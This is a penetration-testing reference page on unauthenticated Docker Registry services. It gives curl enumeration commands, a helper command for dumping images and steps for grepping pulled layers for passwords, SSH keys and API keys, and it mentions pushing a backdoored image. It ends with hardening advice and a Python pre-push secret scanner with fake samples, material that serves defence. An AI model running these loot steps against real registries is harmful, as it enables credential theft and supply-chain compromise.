Docker Registry
aka registry
Container image registry on 5000. Frequently unauthenticated — list the catalog, pull image layers, and unpack them for source code, config and hard-coded secrets baked into the images.
Ports
| Port | Proto | Notes |
|---|---|---|
| 5000 | tcp | Docker Registry API v2 |
Fingerprint
- GET /v2/ returns 200 (or 401 if auth is required) together with the Docker-Distribution-Api-Version response header
- /v2/_catalog lists repositories
Exploitation primitives
- List repos and tags unauthenticated (/v2/_catalog)
- Pull image layers and extract baked-in secrets, source, .env, SSH keys
- Push a backdoored image if the registry is writable
Overview
A Docker Registry on 5000 stores container images. Images routinely contain secrets, so an open registry is a credential and source-code leak.
Enumeration
Confirm the API and list repositories:
curl -s http://<TARGET>:5000/v2/_catalog
List tags for a repo:
curl -s http://<TARGET>:5000/v2/<repo>/tags/list
Pull and loot an image
Grab everything with the helper:
python3 drg.py --host <TARGET> --port 5000 --dump
Or pull and dig manually:
docker pull <TARGET>:5000/<repo>:<tag> && docker history --no-trunc <TARGET>:5000/<repo>:<tag>
Then unpack layers and grep for password, .env, id_rsa, API keys.
Hardening
Require authentication (htpasswd or token auth), keep the registry read-only for anonymous clients at most, serve it over TLS, and scan images before they are pushed so secrets never get baked in.
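For the last point, an added example (not code from this page or from any registry tool): a minimal pre-push layer scanner in Python that walks one image layer tar and flags the same things a manual grep of unpacked layers would find (.env files, SSH keys, password assignments, cloud access-key-shaped strings). The filename and content patterns and the sample layer are constructed for the demo; a real CI gate would run it over every layer of the image and fail the push on any finding.

```python
import io
import re
import tarfile

# Filenames and content patterns a pre-push scan should flag (constructed list;
# mirrors the manual grep for password, .env, id_rsa and API keys).
SUSPICIOUS_NAMES = re.compile(r"(^|/)(\.env|id_rsa|id_ed25519|\.npmrc|\.docker/config\.json)$")
CONTENT_PATTERNS = {
    "private-key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "password-assignment": re.compile(r"(?i)password\s*[=:]\s*\S+"),
}
MAX_FILE_BYTES = 1_000_000  # skip large blobs; secrets live in small text files


def scan_layer(layer_bytes):
    """Return [(path, reason)] for every suspicious file in one layer tar."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue  # directories, symlinks and whiteouts carry no content
            if SUSPICIOUS_NAMES.search(member.name):
                findings.append((member.name, "suspicious filename"))
            if member.size > MAX_FILE_BYTES:
                continue
            # Decode leniently so binaries do not abort the scan.
            text = tar.extractfile(member).read().decode("utf-8", errors="ignore")
            for reason, pattern in CONTENT_PATTERNS.items():
                if pattern.search(text):
                    findings.append((member.name, reason))
    return findings


def build_sample_layer():
    """Constructed sample layer with planted (fake) secrets, not a real image."""
    files = {
        "app/main.py": b"print('hello')\n",
        "app/.env": b"DB_PASSWORD=hunter2\n",  # sample value
        "root/.ssh/id_rsa": b"-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA\n",
        "app/settings.py": b"AWS_KEY = 'AKIAEXAMPLEEXAMPLE01'\n",  # placeholder, not a valid key
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    for path, reason in scan_layer(build_sample_layer()):
        print(f"{path}: {reason}")
```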